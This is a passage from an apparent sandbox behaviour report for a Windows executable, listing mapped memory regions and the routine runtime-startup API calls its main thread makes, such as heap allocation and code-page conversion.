name = "private_0x0000000002f00000" filename = "" Region: id = 389 start_va = 0x28a0000 end_va = 0x294ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028a0000" filename = "" Region: id = 390 start_va = 0x420000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 391 start_va = 0x11e0000 end_va = 0x121ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011e0000" filename = "" Region: id = 392 start_va = 0x2fa0000 end_va = 0x309ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002fa0000" filename = "" Region: id = 393 start_va = 0x30b0000 end_va = 0x30bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000030b0000" filename = "" Region: id = 394 start_va = 0x7efa1000 end_va = 0x7efa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 395 start_va = 0x420000 end_va = 0x421fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 396 start_va = 0x74db0000 end_va = 0x74db7fff monitored = 0 entry_point = 0x74db10e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 397 start_va = 0x723c0000 end_va = 0x723f7fff monitored = 0 entry_point = 0x723c1489 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 398 start_va = 0x74d90000 end_va = 0x74da6fff monitored = 0 entry_point = 0x74d935fa region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 399 start_va = 0x72380000 end_va = 0x723bcfff monitored = 0 entry_point = 0x723810f5 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 400 start_va = 0x73e00000 end_va = 0x73e16fff monitored = 0 entry_point = 0x73e03573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 401 start_va = 0x420000 end_va = 0x45bfff monitored = 0 entry_point = 0x42128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 402 start_va = 0x420000 end_va = 0x45bfff monitored = 0 entry_point = 0x42128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 403 start_va = 0x420000 end_va = 0x45bfff monitored = 0 entry_point = 0x42128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 404 start_va = 0x420000 end_va = 0x45bfff monitored = 0 entry_point = 0x42128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 405 start_va = 0x420000 end_va = 0x45bfff monitored = 0 entry_point = 0x42128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 406 start_va = 0x73dc0000 end_va = 0x73dfafff monitored = 0 entry_point = 0x73dc128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 407 start_va = 0x29d0000 end_va = 0x2acffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029d0000" filename = "" Region: id = 408 start_va = 0x2c30000 end_va = 0x2c6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c30000" filename = "" Region: id = 409 start_va = 0x30e0000 end_va = 0x31dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000030e0000" filename = "" Region: id = 410 start_va = 0x72360000 end_va = 0x72375fff monitored = 0 entry_point = 0x72362061 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\SysWOW64\\gpapi.dll" (normalized: "c:\\windows\\syswow64\\gpapi.dll") Region: id = 411 start_va = 0x7ef9e000 end_va = 0x7efa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 796 start_va = 0x420000 end_va = 0x429fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\crypt32.dll.mui") Region: id = 797 start_va = 0x430000 end_va = 0x440fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_20127.nls" filename = "\\Windows\\System32\\C_20127.NLS" (normalized: "c:\\windows\\system32\\c_20127.nls") Region: id = 798 start_va = 0x31e0000 end_va = 0x33dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031e0000" filename = "" Region: id = 799 start_va = 0x33e0000 end_va = 0x34c8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033e0000" filename = "" Region: id = 800 start_va = 0x33e0000 end_va = 0x3d2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033e0000" filename = "" Region: id = 801 start_va = 0x73c40000 end_va = 0x73d34fff monitored = 0 entry_point = 0x73c50d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 802 start_va = 0x450000 end_va = 0x451fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 803 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 804 start_va = 0x759b0000 end_va = 0x75a32fff monitored = 0 entry_point = 0x759b23d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 805 start_va = 0x4b0000 end_va = 0x4b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 806 start_va = 0x4c0000 end_va = 0x4c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 807 start_va = 0x4d0000 end_va = 0x4ecfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000b.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000b.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000b.db") Region: id = 808 start_va = 0x730000 end_va = 0x730fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000730000" filename = "" Region: id = 809 start_va = 0x4c0000 end_va = 0x4c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 810 start_va = 0xf80000 end_va = 0xfaffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000015.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000015.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000015.db") Region: id = 811 start_va = 0x780000 end_va = 0x783fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 812 start_va = 0x2760000 end_va = 0x27c5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 813 start_va = 0xe70000 end_va = 0xe7dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\propsys.dll.mui") Region: id = 814 start_va = 0x75d50000 end_va = 0x75eecfff monitored = 0 entry_point = 0x75d517e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 815 start_va = 0x77030000 end_va = 0x77056fff monitored = 0 entry_point = 0x770358b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 816 start_va = 0x75020000 end_va = 0x75031fff monitored = 0 entry_point = 0x75021441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 817 start_va = 0xfb0000 end_va = 0xfbcfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\setupapi.dll.mui") Thread: id = 1 os_tid = 0xf44 [0054.933] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x40fa7c | out: lpSystemTimeAsFileTime=0x40fa7c*(dwLowDateTime=0x469dd5a0, dwHighDateTime=0x1d94ef4)) [0054.933] GetCurrentThreadId () returned 0xf44 [0054.933] GetCurrentProcessId () returned 0xf40 [0054.933] QueryPerformanceCounter (in: lpPerformanceCount=0x40fa74 | out: lpPerformanceCount=0x40fa74*=2933975388603) returned 1 [0054.944] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0054.944] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x73a50000 [0054.947] GetProcAddress (hModule=0x73a50000, lpProcName="InitializeCriticalSectionEx") returned 0x0 [0054.948] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0054.948] GetLastError () returned 0x7e [0054.948] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x75130000 [0054.948] GetProcAddress (hModule=0x75130000, lpProcName="FlsAlloc") returned 0x75144ee3 [0054.948] GetProcAddress (hModule=0x75130000, lpProcName="FlsSetValue") returned 0x751441c0 [0054.948] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x73a50000 [0054.949] GetProcAddress (hModule=0x73a50000, lpProcName="InitializeCriticalSectionEx") returned 0x0 [0054.949] GetProcessHeap () returned 0x530000 [0054.949] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0054.949] GetLastError () returned 0x7e [0054.949] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x75130000 [0054.949] GetProcAddress (hModule=0x75130000, lpProcName="FlsAlloc") returned 0x75144ee3 [0054.949] GetLastError () returned 0x7e [0054.949] GetProcAddress (hModule=0x75130000, lpProcName="FlsGetValue") returned 0x75141252 [0054.950] GetProcAddress (hModule=0x75130000, lpProcName="FlsSetValue") returned 0x751441c0 [0054.950] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x364) returned 0x54e7f0 [0054.950] SetLastError (dwErrCode=0x7e) [0054.950] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xe00) returned 0x54eb60 [0054.952] GetStartupInfoW (in: lpStartupInfo=0x40f9b4 | out: lpStartupInfo=0x40f9b4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\out_4.bin.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1238550, hStdOutput=0x58aedc84, hStdError=0xfffffffe)) [0054.952] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0054.952] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0054.952] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0054.952] GetCommandLineA () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\out_4.bin.exe\" " [0054.952] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\out_4.bin.exe\" " [0054.952] GetACP () returned 0x4e4 [0054.952] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x220) returned 0x54e4d8 [0054.952] IsValidCodePage (CodePage=0x4e4) returned 1 [0054.952] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x40f9d4 | out: lpCPInfo=0x40f9d4) returned 1 [0054.952] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x40f29c | out: lpCPInfo=0x40f29c) returned 1 [0054.952] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x40f8b0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0054.952] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x40f8b0, cbMultiByte=256, lpWideCharStr=0x40f038, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0054.952] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x40f2b0 | out: lpCharType=0x40f2b0) returned 1 [0054.952] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x40f8b0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0054.952] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x40f8b0, cbMultiByte=256, lpWideCharStr=0x40eff8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0054.952] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0054.952] GetLastError () returned 0x7e [0054.953] GetProcAddress (hModule=0x75130000, lpProcName="LCMapStringEx") returned 0x751c4d91 [0054.953] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0054.953] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x40ede8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0054.953] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x40f7b0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp\x0bËYìù@", lpUsedDefaultChar=0x0) returned 256 [0054.953] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x40f8b0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0054.953] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x40f8b0, cbMultiByte=256, lpWideCharStr=0x40f008, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0054.953] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0054.953] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x40edf8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0054.953] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x40f6b0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f 